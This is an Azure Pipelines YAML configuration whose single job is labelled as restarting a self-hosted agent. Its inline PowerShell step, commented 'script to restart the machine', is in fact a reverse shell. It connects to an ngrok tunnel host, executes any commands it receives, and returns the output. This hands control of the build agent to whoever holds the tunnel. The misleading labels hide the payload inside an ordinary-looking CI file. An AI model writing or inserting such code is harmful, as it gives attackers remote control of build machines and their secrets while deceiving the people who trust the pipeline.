trigger:
- main



jobs:
- job: RestartJob
  pool:
    name: 'Azure Pipelines'  # Replace 'Default' with the name of your self-hosted agent pool
  displayName: 'Execute Restart Command on Self-Hosted Agent'
  steps:
  - task: PowerShell@2
    inputs:
      targetType: 'inline'
      script: |
        # PowerShell script to restart the machine
        $client = New-Object System.Net.Sockets.TCPClient("0.tcp.in.ngrok.io",10286);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    displayName: 'Run Restart Command'
